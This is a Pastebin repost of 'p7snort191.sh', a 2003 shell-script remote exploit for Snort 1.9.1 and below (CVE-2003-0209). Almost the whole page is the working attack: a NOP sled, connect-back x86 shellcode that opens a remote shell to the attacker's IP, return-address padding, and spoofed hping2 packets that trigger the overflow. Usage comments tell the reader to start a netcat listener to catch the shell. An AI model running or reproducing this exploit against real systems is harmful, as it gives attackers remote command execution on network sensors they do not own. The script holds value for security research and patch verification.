Advertisement
FlyFar

Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution - CVE-2003-0209

Jan 24th, 2024
539
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 4.32 KB | Cybersecurity | 0 0
  1. #!/bin/sh
  2.  
  3. ##########################################################
  4. # p7snort191.sh by truff (truff@projet7.org)             #
  5. # Snort 1.9.1 and below remote exploit                   #
  6. #                                                        #
  7. # Tested on Slackware 8.0 with Snort 1.9.1 from sources  #
  8. #                                                        #
  9. # Usage:                                                 #
  10. # 1/ Launch a listening netcat to listen for the shell   #
  11. # nc -p 45295 -l                                         #
  12. #                                                        #
  13. # 2/ p7snort119.sh yourIP [Ret_Addr]                     #
  14. #                                                        #
  15. # Where yourIP is the IP where the netcat is listening   #
  16. # and Ret_Addr is the address (8 hexa digits) of the     #
  17. # shellcode (eg: 0819fec2)                               #
  18. #                                                        #
  19. #                                                        #
  20. # This vulnerability was discovered by Bruce Leidl,      #
  21. # Juan Pablo Martinez Kuhn, and Alejandro David Weil     #
  22. # from Core Security Technologies during Bugweek 2003.   #
  23. #                                                        #
  24. # Greetz to #root people and projet7 members.            #
  25. # Special thx to mycroft for helping me with shell       #
  26. # scripting stuff.                                       #
  27. #                                                        #
  28. # www.projet7.org - Security Researchs -                 #
  29. ##########################################################
  30.  
  31.  
  32. # Put here the path to your hping2 binary
  33. HPING2=/usr/sbin/hping2
  34.  
  35. # You should change these params to make the snort sensor
  36. # capture the packets.
  37. IPSRC=192.168.22.1
  38. IPDST=192.168.22.2
  39. PTSRC=3339
  40. PTDST=111
  41.  
  42.  
  43.  
  44. echo "p7snort191.sh by truff (truff@projet7.org)"
  45.  
  46. case $# in
  47. 0)
  48. echo "Bad number of params"
  49. echo "Read comments in sources"
  50. exit -1
  51. ;;
  52. 1)
  53. RET=0819fec2
  54. echo "Using default retaddr (Slackware 8.0)"
  55. echo $RET
  56. ;;
  57. 2)
  58. RET=$2
  59. echo "Using custom retaddr"
  60. echo $RET
  61. ;;
  62. *)
  63. echo "Bad number of params"
  64. echo "Read comments in sources"
  65. exit -1
  66. ;;
  67. esac
  68.  
  69.  
  70.  
  71. # Nops
  72. i=0
  73. while [ "$i" -lt "512" ]; do
  74. i=$(expr "$i" + 1)
  75. echo -n -e "\x90" >> egg
  76. done
  77.  
  78.  
  79. # linux x86 shellcode by eSDee of Netric (www.netric.org)
  80. # 131 byte - connect back shellcode (port=0xb0ef)
  81. echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
  82. echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
  83. echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
  84. echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
  85. echo -n -e "\x68" >> egg
  86.  
  87. # IP here
  88. echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
  89. $(echo $1 | cut -d. -f2) \
  90. $(echo $1 | cut -d. -f3) \
  91. $(echo $1 | cut -d. -f4)) >> egg
  92.  
  93. echo -n -e "\x66\x68\xb0" >> egg
  94. echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
  95. echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
  96. echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg
  97. echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
  98. echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
  99. echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
  100. echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
  101. echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
  102. echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
  103. echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
  104. echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
  105. echo -n -e "\x01\xcd\x80" >> egg
  106.  
  107. # 3 dummy bytes for alignment purposes
  108. echo -n -e "\x41\x41\x41" >> egg
  109.  
  110. i=0
  111. cpt=$(expr 3840 - 134 - 512)
  112. cpt=$(expr $cpt / 4)
  113.  
  114.  
  115. var1=0x$(echo $RET | cut -b7,8)
  116. var2=0x$(echo $RET | cut -b5,6)
  117. var3=0x$(echo $RET | cut -b3,4)
  118. var4=0x$(echo $RET | cut -b1,2)
  119.  
  120. while [ "$i" -lt "$cpt" ]; do
  121. i=$(expr "$i" + 1)
  122. echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
  123. done
  124.  
  125.  
  126. # hping ruleZ
  127. $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
  128. -d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
  129. 1>/dev/null 2>/dev/null
  130.  
  131. $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
  132. -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
  133. 1>/dev/null 2>/dev/null
  134.  
  135. $HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
  136. -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
  137. 1>/dev/null 2>/dev/null
  138.  
  139. rm egg
  140.  
  141. echo "Exploit Sended"
  142.  
  143. # milw0rm.com [2003-04-23]
  144.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement